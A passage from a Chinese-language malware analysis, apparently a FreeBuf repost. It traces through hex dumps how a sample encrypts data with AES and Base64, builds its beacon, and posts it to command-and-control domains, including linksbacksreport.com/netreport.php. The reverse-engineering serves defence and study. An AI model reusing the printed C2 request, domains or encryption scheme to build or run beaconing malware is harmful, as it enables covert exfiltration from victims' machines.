54 79 hmainType.gsubTy 014CE7D8 70 65 01 67 42 69 74 6E 65 73 73 18 20 6B 64 77 pe.gBitness. kdw 014CE7E8 54 69 6D 65 73 74 61 6D 70 00 64 44 61 74 61 A2 Timestamp.dDataó 014CE7F8 66 4C 65 6E 67 74 68 00 66 6C 70 44 61 74 61 40 fLength.flpData@ +00 length of the random string (9) +04 pseudo-randomly generated 9 bytes string. +0D 0 +0E data (here data size is 0x123, total structure size is 0x130)
生成另外一个9字节长度的伪随机字符串:
0012D6D8 78 6A 79 4C 4A 5A 51 61 64 00 00 00 30 D7 12 00 xjyLJZQad
计算这个伪随机字符串的MD5散列:
0012D6BC 52 37 D7 C2 07 D1 D3 C6 B5 26 F4 FF AC 29 CF CB R7+-.-+¦¦&( ¼)--
上面的BLOB数据使用AES加密。加密的密钥为第二个伪随机字符串的MD5散列。
014CFBD0 99 76 C5 58 A7 34 93 BC 54 A6 85 54 DF 79 F6 1A Öv+Xº4ô+TªàT¯y÷. 014CFBE0 B9 A2 47 46 1A FE 81 49 22 77 02 A2 10 ED EF 2D ¦óGF.¦.I"w.ó.fn- 014CFBF0 41 43 25 91 3E 3A F7 DE 9F C2 C8 EB FC 07 75 0F AC%æ>:˜¦ƒ-+dn.u. 014CFC00 87 44 01 66 9F 1B 54 7D A0 64 D8 02 6C C1 ED BA çD.fƒ.T}ád+.l-f¦ 014CFC10 56 DD BA 5F 63 2A 2C 01 B0 89 D4 19 FF 3F 4F 66 V¦¦_c*,.¦ë+. ?Of 014CFC20 54 5A 80 94 81 DA 1E 93 61 66 52 B4 B7 B5 45 09 TZÇö.+.ôafR¦+¦E. 014CFC30 B2 52 D1 37 2A 19 40 C3 77 07 EB B9 C2 B4 23 7D ¦R-7*.@+w.d¦-¦#} 014CFC40 10 31 8B A9 2E F1 4E 5E 67 46 09 8B 1C 5B ED F1 .1ï¬.±N^gF.ï.[f± 014CFC50 07 C8 DB 3D 71 3A A8 96 58 F2 95 10 F0 D8 89 33 .+¦=q:¿ûX=ò.=+ë3 014CFC60 11 41 26 AD BD 99 A5 79 9A 11 DE A5 17 2A 68 86 .A&¡+ÖÑyÜ.¦Ñ.*hå 014CFC70 88 C0 03 04 EF 59 5C 7E D4 9F 13 7F D2 90 B5 2A ê+..nY/~+ƒ..-.¦* 014CFC80 00 37 D6 08 91 CD 76 DD 9B EF CD B3 61 BF 66 D5 .7+.æ-v¦¢n-¦a+f+ 014CFC90 9B C4 B3 6B 49 41 F7 E8 34 39 64 17 5F CA AC 8B ¢-¦kIA˜F49d._-¼ï 014CFCA0 1A C2 81 1F 23 09 15 C7 01 6F 51 61 74 93 79 28 .-..#..¦.oQatôy( 014CFCB0 EA B8 74 28 D2 7F 09 34 CC C2 01 CE 5B 94 F0 3C O+t(-..4¦-.+[ö=< 014CFCC0 EE 22 A9 3F C9 91 DC 0E CB 98 D0 06 8B 25 A8 CA e"¬?+æ_.-ÿ-.ï%¿- 014CFCD0 73 43 E1 86 88 03 AB 34 83 E3 FC 6A EA 01 57 52 sCßåê.½4âpnjO.WR 014CFCE0 EB A8 52 3C 8A 7D 13 23 6F B0 DA 08 FC 90 31 98 d¿R<è}.#o¦+.n.1ÿ 014CFCF0 FD E4 C4 DF 75 CE DC B6 DA DD B7 23 7C A8 A0 9B ²S-¯u+_¦+¦+#|¿á¢
以下数据是以用于加密注册表中的数据所生成的初始AES密钥的中的硬编码的数据生成的:
014CE830 AA 00 00 00 08 00 CC F6 B7 9B 80 C0 6A 76 81 52 ¬.....¦÷+¢Ç+jv.R 014CE840 CA E5 6C EA 1C 81 C8 DD 56 FD 6B D4 99 71 5E 9D -slO..+¦V²k+Öq^. 014CE850 A1 DF B2 2A 28 00 08 00 8A 78 46 D8 AA F0 D1 BB í¯¦*(...èxF+¬=-+ 014CE860 64 A3 45 4C 43 94 C5 8F ED A1 03 BD 1A 8A 38 5D dúELCö+.fí.+.è8] 014CE870 19 F0 DA 08 E7 24 22 00 08 00 FA 8A 21 0E 84 DF .=+.t$"...·è!.ä¯ 014CE880 CE 54 FD 53 75 AB 3D 1F 99 23 43 9E 39 AE A2 55 +T²Su½=.Ö#CP9«óU 014CE890 2C 15 09 DB 0E F2 A4 59 1A 00 08 00 88 26 CF E5 ,..¦.=ñY....ê&-s 014CE8A0 D4 71 5A D6 74 98 72 D0 5E 8C A6 F3 A1 CF 9C 5B +qZ+tÿr-^îª=í-£[ 014CE8B0 A7 5D 4C B0 FA B7 39 C2 7B A2 30 00 08 00 A4 06 º]L¦·+9-{ó0...ñ. 014CE8C0 D9 5E 85 2F D6 0B 94 36 79 56 B6 31 73 87 18 F8 +^à/+.ö6yV¦1sç.° 014CE8D0 69 8A FF 03 7F 20 82 20 14 28 51 E5 1A 00 AD BA iè .. é .(Qs..¡¦
这个数据将于AES的加密缓冲区联接在一起:
014CFD18 AA 00 00 00 08 00 CC F6 B7 9B 80 C0 6A 76 81 52 ¬.....¦÷+¢Ç+jv.R 014CFD28 CA E5 6C EA 1C 81 C8 DD 56 FD 6B D4 99 71 5E 9D -slO..+¦V²k+Öq^. 014CFD38 A1 DF B2 2A 28 00 08 00 8A 78 46 D8 AA F0 D1 BB í¯¦*(...èxF+¬=-+ 014CFD48 64 A3 45 4C 43 94 C5 8F ED A1 03 BD 1A 8A 38 5D dúELCö+.fí.+.è8] 014CFD58 19 F0 DA 08 E7 24 22 00 08 00 FA 8A 21 0E 84 DF .=+.t$"...·è!.ä¯ 014CFD68 CE 54 FD 53 75 AB 3D 1F 99 23 43 9E 39 AE A2 55 +T²Su½=.Ö#CP9«óU 014CFD78 2C 15 09 DB 0E F2 A4 59 1A 00 08 00 88 26 CF E5 ,..¦.=ñY....ê&-s 014CFD88 D4 71 5A D6 74 98 72 D0 5E 8C A6 F3 A1 CF 9C 5B +qZ+tÿr-^îª=í-£[ 014CFD98 A7 5D 4C B0 FA B7 39 C2 7B A2 30 00 08 00 A4 06 º]L¦·+9-{ó0...ñ. 014CFDA8 D9 5E 85 2F D6 0B 94 36 79 56 B6 31 73 87 18 F8 +^à/+.ö6yV¦1sç.° 014CFDB8 69 8A FF 03 7F 20 82 20 14 28 51 E5 1A 00 99 76 iè .. é .(Qs..Öv 014CFDC8 C5 58 A7 34 93 BC 54 A6 85 54 DF 79 F6 1A B9 A2 +Xº4ô+TªàT¯y÷.¦ó 014CFDD8 47 46 1A FE 81 49 22 77 02 A2 10 ED EF 2D 41 43 GF.¦.I"w.ó.fn-AC 014CFDE8 25 91 3E 3A F7 DE 9F C2 C8 EB FC 07 75 0F 87 44 %æ>:˜¦ƒ-+dn.u.çD 014CFDF8 01 66 9F 1B 54 7D A0 64 D8 02 6C C1 ED BA 56 DD .fƒ.T}ád+.l-f¦V¦ 014CFE08 BA 5F 63 2A 2C 01 B0 89 D4 19 FF 3F 4F 66 54 5A ¦_c*,.¦ë+. ?OfTZ 014CFE18 80 94 81 DA 1E 93 61 66 52 B4 B7 B5 45 09 B2 52 Çö.+.ôafR¦+¦E.¦R 014CFE28 D1 37 2A 19 40 C3 77 07 EB B9 C2 B4 23 7D 10 31 -7*.@+w.d¦-¦#}.1 014CFE38 8B A9 2E F1 4E 5E 67 46 09 8B 1C 5B ED F1 07 C8 ï¬.±N^gF.ï.[f±.+ 014CFE48 DB 3D 71 3A A8 96 58 F2 95 10 F0 D8 89 33 11 41 ¦=q:¿ûX=ò.=+ë3.A 014CFE58 26 AD BD 99 A5 79 9A 11 DE A5 17 2A 68 86 88 C0 &¡+ÖÑyÜ.¦Ñ.*håê+ 014CFE68 03 04 EF 59 5C 7E D4 9F 13 7F D2 90 B5 2A 00 37 ..nY/~+ƒ..-.¦*.7 014CFE78 D6 08 91 CD 76 DD 9B EF CD B3 61 BF 66 D5 9B C4 +.æ-v¦¢n-¦a+f+¢- 014CFE88 B3 6B 49 41 F7 E8 34 39 64 17 5F CA AC 8B 1A C2 ¦kIA˜F49d._-¼ï.- 014CFE98 81 1F 23 09 15 C7 01 6F 51 61 74 93 79 28 EA B8 ..#..¦.oQatôy(O+ 014CFEA8 74 28 D2 7F 09 34 CC C2 01 CE 5B 94 F0 3C EE 22 t(-..4¦-.+[ö=<e" 014CFEB8 A9 3F C9 91 DC 0E CB 98 D0 06 8B 25 A8 CA 73 43 ¬?+æ_.-ÿ-.ï%¿-sC 014CFEC8 E1 86 88 03 AB 34 83 E3 FC 6A EA 01 57 52 EB A8 ßåê.½4âpnjO.WRd¿ 014CFED8 52 3C 8A 7D 13 23 6F B0 DA 08 FC 90 31 98 FD E4 R<è}.#o¦+.n.1ÿ²S 014CFEE8 C4 DF 75 CE DC B6 DA DD B7 23 7C A8 A0 9B AD BA -¯u+_¦+¦+#|¿á¢¡¦
然后,进行Base64编码:
014CFF18 71 67 41 41 41 41 67 41 7A 50 61 33 6D 34 44 41 qgAAAAgAzPa3m4DA 014CFF28 61 6E 61 42 55 73 72 6C 62 4F 6F 63 67 63 6A 64 anaBUsrlbOocgcjd 014CFF38 56 76 31 72 31 4A 6C 78 58 70 32 68 33 37 49 71 Vv1r1JlxXp2h37Iq 014CFF48 4B 41 41 49 41 49 70 34 52 74 69 71 38 4E 47 37 KAAIAIp4Rtiq8NG7 014CFF58 5A 4B 4E 46 54 45 4F 55 78 59 2F 74 6F 51 4F 39 ZKNFTEOUxY/toQO9 014CFF68 47 6F 6F 34 58 52 6E 77 32 67 6A 6E 4A 43 49 41 Goo4XRnw2gjnJCIA 014CFF78 43 41 44 36 69 69 45 4F 68 4E 2F 4F 56 50 31 54 CAD6iiEOhN/OVP1T 014CFF88 64 61 73 39 48 35 6B 6A 51 35 34 35 72 71 4A 56 das9H5kjQ545rqJV 014CFF98 4C 42 55 4A 32 77 37 79 70 46 6B 61 41 41 67 41 LBUJ2w7ypFkaAAgA 014CFFA8 69 43 62 50 35 64 52 78 57 74 5A 30 6D 48 4C 51 iCbP5dRxWtZ0mHLQ 014CFFB8 58 6F 79 6D 38 36 48 50 6E 46 75 6E 58 55 79 77 Xoym86HPnFunXUyw 014CFFC8 2B 72 63 35 77 6E 75 69 4D 41 41 49 41 4B 51 47 +rc5wnuiMAAIAKQG 014CFFD8 32 56 36 46 4C 39 59 4C 6C 44 5A 35 56 72 59 78 2V6FL9YLlDZ5VrYx 014CFFE8 63 34 63 59 2B 47 6D 4B 2F 77 4E 2F 49 49 49 67 c4cY+GmK/wN/IIIg 014CFFF8 46 43 68 52 35 52 6F 41 6D 58 62 46 57 4B 63 30 FChR5RoAmXbFWKc0 014D0008 6B 37 78 55 70 6F 56 55 33 33 6E 32 47 72 6D 69 k7xUpoVU33n2Grmi 014D0018 52 30 59 61 2F 6F 46 4A 49 6E 63 43 6F 68 44 74 R0Ya/oFJIncCohDt 014D0028 37 79 31 42 51 79 57 52 50 6A 72 33 33 70 2F 43 7y1BQyWRPjr33p/C 014D0038 79 4F 76 38 42 33 55 50 68 30 51 42 5A 70 38 62 yOv8B3UPh0QBZp8b 014D0048 56 48 32 67 5A 4E 67 43 62 4D 48 74 75 6C 62 64 VH2gZNgCbMHtulbd 014D0058 75 6C 39 6A 4B 69 77 42 73 49 6E 55 47 66 38 2F ul9jKiwBsInUGf8/ 014D0068 54 32 5A 55 57 6F 43 55 67 64 6F 65 6B 32 46 6D T2ZUWoCUgdoek2Fm 014D0078 55 72 53 33 74 55 55 4A 73 6C 4C 52 4E 79 6F 5A UrS3tUUJslLRNyoZ 014D0088 51 4D 4E 33 42 2B 75 35 77 72 51 6A 66 52 41 78 QMN3B+u5wrQjfRAx 014D0098 69 36 6B 75 38 55 35 65 5A 30 59 4A 69 78 78 62 i6ku8U5eZ0YJixxb 014D00A8 37 66 45 48 79 4E 73 39 63 54 71 6F 6C 6C 6A 79 7fEHyNs9cTqolljy 014D00B8 6C 52 44 77 32 49 6B 7A 45 55 45 6D 72 62 32 5A lRDw2IkzEUEmrb2Z 014D00C8 70 58 6D 61 45 64 36 6C 46 79 70 6F 68 6F 6A 41 pXmaEd6lFypohojA 014D00D8 41 77 54 76 57 56 78 2B 31 4A 38 54 66 39 4B 51 AwTvWVx+1J8Tf9KQ 014D00E8 74 53 6F 41 4E 39 59 49 6B 63 31 32 33 5A 76 76 tSoAN9YIkc123Zvv 014D00F8 7A 62 4E 68 76 32 62 56 6D 38 53 7A 61 30 6C 42 zbNhv2bVm8Sza0lB 014D0108 39 2B 67 30 4F 57 51 58 58 38 71 73 69 78 72 43 9+g0OWQXX8qsixrC 014D0118 67 52 38 6A 43 52 58 48 41 57 39 52 59 58 53 54 gR8jCRXHAW9RYXST 014D0128 65 53 6A 71 75 48 51 6F 30 6E 38 4A 4E 4D 7A 43 eSjquHQo0n8JNMzC 014D0138 41 63 35 62 6C 50 41 38 37 69 4B 70 50 38 6D 52 Ac5blPA87iKpP8mR 014D0148 33 41 37 4C 6D 4E 41 47 69 79 57 6F 79 6E 4E 44 3A7LmNAGiyWoynND 014D0158 34 59 61 49 41 36 73 30 67 2B 50 38 61 75 6F 42 4YaIA6s0g+P8auoB 014D0168 56 31 4C 72 71 46 49 38 69 6E 30 54 49 32 2B 77 V1LrqFI8in0TI2+w 014D0178 32 67 6A 38 6B 44 47 59 2F 65 54 45 33 33 58 4F 2gj8kDGY/eTE33XO 014D0188 33 4C 62 61 33 62 63 6A 66 4B 69 67 6D 77 3D 3D 3Lba3bcjfKigmw==
Base64编码的缓冲区会检查“+”和“=”字符的存在。并将这些字符分别替换为“%2B”和“%3D”。该恶意软件会创建另外一个的7个字节长的伪随机字符串:
0012D780 6C 56 46 64 69 59 70 00 00 00 00 00 00 00 00 00 lVFdiYp
这个伪随机字符串将被放置到Base64编码缓冲区中:
014D0C28 78 59 2F 74 6F 51 4F 39 47 6F 6F 34 58 52 6E 77 xY/toQO9Goo4XRnw 014D0C38 32 67 6A 6E 4A 43 49 41 43 41 44 36 69 69 45 4F 2gjnJCIACAD6iiEO 014D0C48 68 4E 2F 4F 56 50 31 54 64 61 73 39 48 35 6B 6A hN/OVP1Tdas9H5kj 014D0C58 51 35 34 35 72 71 4A 56 4C 42 55 4A 32 77 37 79 Q545rqJVLBUJ2w7y 014D0C68 70 46 6B 61 41 41 67 41 69 43 62 50 35 64 52 78 pFkaAAgAiCbP5dRx 014D0C78 57 74 5A 30 6D 48 4C 51 58 6F 79 6D 38 36 48 50 WtZ0mHLQXoym86HP 014D0C88 6E 46 75 6E 58 55 79 77 25 32 42 72 63 35 77 6E nFunXUyw%2Brc5wn 014D0C98 75 69 4D 41 41 49 41 4B 51 47 32 56 36 46 4C 39 uiMAAIAKQG2V6FL9 014D0CA8 59 4C 6C 44 5A 35 56 72 59 78 63 34 63 59 25 32 YLlDZ5VrYxc4cY%2 014D0CB8 42 47 6D 4B 2F 77 4E 2F 49 49 49 67 46 43 68 52 BGmK/wN/IIIgFChR 014D0CC8 35 52 6F 41 6D 58 62 46 57 4B 63 30 6B 37 78 55 5RoAmXbFWKc0k7xU 014D0CD8 70 6F 56 55 33 33 6E 32 47 72 6D 69 52 30 59 61 poVU33n2GrmiR0Ya 014D0CE8 2F 6F 46 4A 49 6E 63 43 6F 68 44 74 37 79 31 42 /oFJIncCohDt7y1B 014D0CF8 51 79 57 52 50 6A 72 33 33 70 2F 43 79 4F 76 38 QyWRPjr33p/CyOv8 014D0D08 42 33 55 50 68 30 51 42 5A 70 38 62 56 48 32 67 B3UPh0QBZp8bVH2g 014D0D18 5A 4E 67 43 62 4D 48 74 75 6C 62 64 75 6C 39 6A ZNgCbMHtulbdul9j 014D0D28 4B 69 77 42 73 49 6E 55 47 66 38 2F 54 32 5A 55 KiwBsInUGf8/T2ZU 014D0D38 57 6F 43 55 67 64 6F 65 6B 32 46 6D 55 72 53 33 WoCUgdoek2FmUrS3 014D0D48 74 55 55 4A 73 6C 4C 52 4E 79 6F 5A 51 4D 4E 33 tUUJslLRNyoZQMN3 014D0D58 42 25 32 42 75 35 77 72 51 6A 66 52 41 78 69 36 B%2Bu5wrQjfRAxi6 014D0D68 6B 75 38 55 35 65 5A 30 59 4A 69 78 78 62 37 66 ku8U5eZ0YJixxb7f 014D0D78 45 48 79 4E 73 39 63 54 71 6F 6C 6C 6A 79 6C 52 EHyNs9cTqolljylR 014D0D88 44 77 32 49 6B 7A 45 55 45 6D 72 62 32 5A 70 58 Dw2IkzEUEmrb2ZpX 014D0D98 6D 61 45 64 36 6C 46 79 70 6F 68 6F 6A 41 41 77 maEd6lFypohojAAw 014D0DA8 54 76 57 56 78 25 32 42 31 4A 38 54 66 39 4B 51 TvWVx%2B1J8Tf9KQ 014D0DB8 74 53 6F 41 4E 39 59 49 6B 63 31 32 33 5A 76 76 tSoAN9YIkc123Zvv 014D0DC8 7A 62 4E 68 76 32 62 56 6D 38 53 7A 61 30 6C 42 zbNhv2bVm8Sza0lB 014D0DD8 39 25 32 42 67 30 4F 57 51 58 58 38 71 73 69 78 9%2Bg0OWQXX8qsix 014D0DE8 72 43 67 52 38 6A 43 52 58 48 41 57 39 52 59 58 rCgR8jCRXHAW9RYX 014D0DF8 53 54 65 53 6A 71 75 48 51 6F 30 6E 38 4A 4E 4D STeSjquHQo0n8JNM 014D0E08 7A 43 41 63 35 62 6C 50 41 38 37 69 4B 70 50 38 zCAc5blPA87iKpP8 014D0E18 6D 52 33 41 37 4C 6D 4E 41 47 69 79 57 6F 79 6E mR3A7LmNAGiyWoyn 014D0E28 4E 44 34 59 61 49 41 36 73 30 67 25 32 42 50 38 ND4YaIA6s0g%2BP8 014D0E38 61 75 6F 42 56 31 4C 72 71 46 49 38 69 6E 30 54 auoBV1LrqFI8in0T 014D0E48 49 32 25 32 42 77 32 67 6A 38 6B 44 47 59 2F 65 I2%2Bw2gj8kDGY/e 014D0E58 54 45 33 33 58 4F 33 4C 62 61 33 62 63 6A 66 4B TE33XO3Lba3bcjfK 014D0E68 69 67 6D 77 25 33 44 25 33 44 00 00 00 00 00 00 igmw%3D%3D......
此数据变成了恶意软件发送到C&C服务器的请求内容。下面所显示的是恶意软件与C&C服务器建立通信时所使用的WinINET API的顺序:
InternetOpenA ->InternetConnectA -> HttpOpenRequestA -> InternetSetOptionA ->HttpAddRequestHeadersA-> InternetQueryOptionA -> InternetSetOptionA -> HttpSendRequestA .
该恶意软件会创建一个包含所有与请求相关的信息的结构:
0012C2F4 02 00 00 00 50 4F 53 54 00 00 00 00 00 00 00 00 ....POST........ 0012C304 10 1A 41 00 78 E4 12 00 00 00 00 00 F0 7B 85 00 ..A.xS......={à. 0012C314 96 02 00 00 00 00 00 00 7F 00 00 01 50 00 73 6F û...........P.so 0012C324 66 74 2E 6B 63 73 73 6F 66 74 2E 62 69 7A 00 00 ft.kcssoft.biz.. +04 request type +10 user-agent(pointer) +14 callback domain(pointer) +1C data(pointer) +20 data size +28 IP address +2C port +2E callback domain
请求示例:
POST /netreport.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Host: linksbacksreport.com Content-Length: 660 Cache-Control: no-cache ROVivvn=qgAAAAgAnARHff0xZPE00vxRaB9ckHI5PjMe1aS2Esg25vckKQAIAKFrp8coemQ03zIpl j77vqVlZSznbkKODJhKHmHZ4SsACAARNkkvw57mRSjtycoWwPyy0kftYPDihXzAUSN0V9sFAAgAxy Dorqby0JdIt8dt3evWx2UzRarDJehmERfgEMusBQAIAKTf4bMa6zL6dkzPu3yq5/J8BUPk0e/ss9c mZdJpBgMAxGjEiHDNUZ/0/FiYXB4uXxPAeTeNHTDj3LQEmuejOkcBEN4K0zB3ch2uTWPlpFHP5o68 X5BUP/1rFgCO%2BTHJ4hHJXylQY4hmm1LtyGHw5ZYaJxrMtWK%2BcKCeUVs/Hq/dV3E4BkeLklzkT 9S5%2B5oxSF6d4aAxyee7VzwAg9pBZGXZxyJQBDCVuAjyw1QSeial8vI69Q9I9ACgJ9YxWVeFHTF% 2B7CTzyqR3DChYFuNmzsZ8AUR6SpfyZKxRtRQpz3XEb0k7Wqk3WgJHAtzBhq5suMZzHYMQaeDow6Q JIL52WsEPCig35m5EfIC9Bh1RZkcvnw44p7axtBQ3D2Ue7fKTFknARNvQHvkzXt7QiCUkwLBpUs1z p3vhbhdyKVBCKP65biyzElXdZEh/D49UnoFG8w%3D%3D
第一阶段很成功的从反病毒引擎中隐藏了恶意软件的主模块,在当时来看,它是第一次出现。但是,第一阶段未能隐藏主模块的反病毒签名。加密通信给动态分析制造了困难,因为它使得很难去搞清楚PAYLOAD的制造过程。恶意软件采用持久性的机制(创建用户下次登录运行的计划任务)并不常见。
,编译/丝绸之路,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)